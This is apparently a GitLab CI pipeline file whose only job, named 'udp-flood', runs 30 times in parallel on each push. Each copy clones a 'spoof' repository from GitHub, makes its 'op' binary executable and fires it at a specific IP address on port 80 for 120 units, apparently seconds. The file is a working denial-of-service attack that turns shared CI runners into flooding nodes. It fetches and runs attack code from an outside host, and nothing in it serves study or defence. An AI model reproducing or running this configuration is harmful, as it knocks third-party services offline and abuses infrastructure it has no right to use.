stages:
  - flood

udp-flood:
  stage: flood
  image: docker:latest
  services:
    - docker:dind
  parallel: 30
  script:
    - |
      docker run --rm --network host \
        -v $(pwd):/app \
        ubuntu:22.04 \
        sh -c "
          apt-get update && apt-get install -y git &&
          git clone https://github.com/Titanop242424/spoof.git /app/spoof &&
          chmod +x /app/spoof/op &&
          /app/spoof/op 162.245.204.228 80 120
        "
  rules:
    - if: $CI_PIPELINE_SOURCE == "push"
